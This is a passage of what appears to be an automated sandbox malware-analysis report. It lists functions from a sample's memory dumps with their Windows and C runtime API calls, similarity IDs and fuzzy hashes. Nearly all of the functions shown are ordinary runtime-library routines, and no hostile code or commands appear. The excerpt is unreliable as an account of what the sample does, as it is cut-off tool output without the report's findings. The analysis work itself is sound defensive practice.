                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                                                                                                                                                  Function 008618DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000008,?,?,008615D8,00863CBB,?,00861D2A,?,?,00000000), ref: 008618E4
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00861919
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00861940
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00861D2A,?,?,00000000), ref: 0086194D
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00861D2A,?,?,00000000), ref: 00861956
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6ea50eebfd83ed598f3e5e8193e46fa21e5f49c51ea42f789a2e125cf1ca019a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9d933050a899c220c6c12e122757954b3dc8e56fc5c160a64cf2b6e30ad24f65
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ea50eebfd83ed598f3e5e8193e46fa21e5f49c51ea42f789a2e125cf1ca019a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA014933100E026B9B1267396C9D92B1A1DFBC237876B0024F905F2253FE6288414423
                                                                                                                                                                                                                                                                                                                                  Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(02BD1670), ref: 00414050
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4271482742-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                                                                                                                                                  Function 00863171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00863189
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00862096: HeapFree.KERNEL32(00000000,00000000,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?), ref: 008620AC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00862096: GetLastError.KERNEL32(?,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?,?), ref: 008620BE
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0086319B
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008631AD
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008631BF
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008631D1
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cf062f7ae5650ccc6f8d34f9c904a30558b88544c11f6ebb6589040d8d9048fb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0514d0235a0cd3cc52bf9786c224c2849b11d7bea10c10e7704cb58db8154c70
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf062f7ae5650ccc6f8d34f9c904a30558b88544c11f6ebb6589040d8d9048fb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54F01D32A44B01ABC674EB6CF986C1A73D9FE057157661849F54AE7601CB30FD808FA5
                                                                                                                                                                                                                                                                                                                                  Function 0040FA58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __calloc_crt
                                                                                                                                                                                                                                                                                                                                  • String ID: P$B$`$B
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494438863-235554963
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C
                                                                                                                                                                                                                                                                                                                                  Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-3105848591
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                                                                                                                                                  Function 004146FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 0041470C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A
                                                                                                                                                                                                                                                                                                                                  • ___removelocaleref.LIBCMT ref: 00414717
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1
                                                                                                                                                                                                                                                                                                                                  • ___freetlocinfo.LIBCMT ref: 0041472B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                                                                                                                                                                                                                                                                                  • String ID: @.B
                                                                                                                                                                                                                                                                                                                                  • API String ID: 467427115-470711618
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8e9b8205a585dc9325c25650a27042e0212317e7447dcce9b0fe23aa5a8dd77f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDE0863250192255CE35261D76806EF93A98FD3725B3A017FF864AF7D8EB2C4CC0809D
                                                                                                                                                                                                                                                                                                                                  Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3322701435-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                                                                                                                                                  Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                                                                                                                                                  • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2395185920-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                                                                                                                                                  Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _fseek_malloc_memset
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 208892515-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                                                                                                                                                  Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                                                                                                                                                  • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                                                                                                                                                  • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                                                                                                                                                  • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3240763771-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                                                                                                                                                  Function 008634FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 0086354C
